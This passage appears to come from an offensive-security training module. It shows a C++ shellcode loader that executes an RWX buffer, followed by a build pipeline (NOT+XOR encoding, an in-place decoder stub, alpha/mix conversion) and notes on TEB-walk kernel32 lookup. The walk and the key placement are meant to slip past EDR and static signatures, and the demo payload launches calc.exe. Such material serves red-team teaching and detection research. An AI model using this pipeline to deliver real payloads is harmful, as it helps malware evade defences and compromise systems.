    // PAGE_EXECUTE_READWRITE required: decoder stub writes decoded bytes in-place
    void* exec_mem = VirtualAlloc(
        nullptr, shellcode_size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );
    if (!exec_mem) {
        std::cerr << "[-] VirtualAlloc failed\n";
        return -1;
    }

    memcpy(exec_mem, shellcode, shellcode_size);

    // Cast and call: decoder stub runs first, decodes payload, jmps to shellcode
    auto fn = reinterpret_cast<void(*)()>(exec_mem);
    fn();

    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
}

Full Pipeline — From .asm to Final Alpha/Mix Shellcode

Shell Complete workflow — calc.asm → encoded → decoder stub → alpha/mix → loader.cpp
# ── Stage 1: The payload shellcode ──
# Write calc.asm (TEB-walk kernel32 finder + WinExec)
# Compile to .obj
nasm -fwin64 calc.asm -o calc.obj

# Extract raw bytes
python findhex.py calc.obj
# Output: \x4d\x87\xe6... → paste into not_xor_encoder.py shellcode variable

# Encode with NOT + XOR + embedded key
python not_xor_encoder.py
# Output: encoded bytes + "Key position: offset N in encoded output"
# Note the key index: you'll need it for decoder.asm

# ── Stage 2: The decoder stub ──
# Paste encoded bytes into decoder.asm as the encoded_shellcode db block
# Update the key index: mov r9b, [rel encoded_shellcode + N]
# Compile (no -no-pie needed; -N makes .text writable for standalone test)
nasm -fwin64 decoder.asm -o decoder.obj
ld -m i386pep -N -o decoder.exe decoder.obj

# Test standalone: decoder.exe should launch calc.exe, which confirms decode works
decoder.exe

# ── Stage 3: Extract + alpha/mix encode ──
# Extract full payload from decoder.obj (stub + encoded shellcode)
python findhex.py decoder.obj
# Output: full combined bytes → paste into alpha_mix.py hex_list variable

# Convert to mixed ASCII/hex C string tokens
python alpha_mix.py
# Output: "H" "\x8d" "5" "#" "\x00" ... → paste into loader.cpp shellcode[]

# ── Stage 4: Final loader ──
# Paste alpha_mix.py output into loader.cpp shellcode[] array
# Compile and run: decoder stub fires, decodes in-place, calc.exe launches
x86_64-w64-mingw32-g++ -o loader.exe loader.cpp
  • Both paths reach the PEB, but the standard mov rax, [gs:0x60] shortcut is a well-known access pattern. Some security products treat this instruction's byte pattern as an indicator of shellcode performing a PEB walk.

    Going through the TEB explicitly — gs:[0x30] for TEB base, then [rax+0x60] for PEB — is architecturally equivalent but takes a different code path. It also mirrors how Windows itself navigates these structures internally, making it harder to distinguish from legitimate code.

    💡 In WinDbg: dt nt!_TEB @$teb shows the TEB layout. ProcessEnvironmentBlock is at offset 0x060. dt nt!_PEB @$peb shows the PEB layout, where Ldr is at 0x018.
  • Windows stores module names as UTF-16LE strings. Each ASCII character becomes a 2-byte WORD: the ASCII value in the low byte, 0x00 in the high byte. Reading "KERN" as four UTF-16LE WORDs:

    • K = 0x004B, E = 0x0045, R = 0x0052, N = 0x004E
    • In memory (little-endian): 4B 00 45 00 52 00 4E 00
    • As a 64-bit little-endian immediate: 0x004E00520045004B

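    Loading [rcx] (first 8 bytes of the name buffer) into RBX and comparing with this immediate checks all four characters in a single instruction. It is efficient, but it is not NULL-free: the 64-bit immediate itself contains 0x00 bytes, so mov rdx, 0x004E00520045004B assembles with NULLs in its encoding.

    💡 To search for a different DLL: take the first 4 characters of its name, encode each as a WORD (char + 0x00), then build the 8-byte little-endian immediate. For example, N=0x004E T=0x0054 D=0x0044 L=0x004C → 0x004C00440054004E. The comparison is case-sensitive, so match the casing actually stored in the loader entry and check it in a debugger first: ntdll is commonly stored in lowercase as ntdll.dll, which would need 0x006C00640074006E instead.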
  • Embedding the key at position = xor_key % len(payload) means the key byte position is a function of the key value itself. Change xor_key from 0xAC to 0x7F and two things change simultaneously:

    • All encoded bytes change — different XOR key produces completely different output bytes
    • The key's position in the output changes — 0x7F % len vs 0xAC % len are almost certainly different offsets

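    This means a static signature targeting "the key byte is at offset N" is invalidated just by changing the key. The decoder stub in this module does not compute the position itself: it reads the key from a hardcoded index (mov r9b, [rel encoded_shellcode + 38]), so update that index to the offset the encoder prints whenever the key or the payload length changes.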

    ⚠ Always verify the round-trip after changing the key. Some keys produce bad characters (0x00, 0x20, 0x0A, 0x0D) in the encoded output that will break delivery through string-handling functions. Test with your specific delivery mechanism.
  • Even when RSP and RBP appear absent from the shellcode's explicit instructions, they always have implicit roles. RSP is the active stack pointer — always in use, always changing with every push/pop/call/ret. Inserting junk that modifies RSP would immediately corrupt the stack and crash execution.

    RBP is excluded defensively — even if the shellcode doesn't explicitly use it, the compiler or linker may use frame-pointer conventions that depend on RBP being stable. It's excluded from the candidates list unconditionally:

    [r for r in candidates if r not in ['rsp', 'rbp']]

    For the calc.asm TEB-walk shellcode, the registers available for junk injection are typically r12, r13, r14 — the non-volatile callee-saved registers not needed in the KERN search or WinExec call chain. The script prints them on stderr when it runs so you can verify.

Module Complete. You now have a full end-to-end shellcode pipeline running natively on Windows — no msfvenom, no Linux VM: TEB-walk kernel32 discovery that bypasses EDR position hooks, Windows-native .obj byte extraction, NOT+XOR encoding with self-embedded key, an x64 decoder stub that decodes in-place and jmps to the payload, and alpha/mix conversion for C string literal delivery. No two builds produce the same bytes.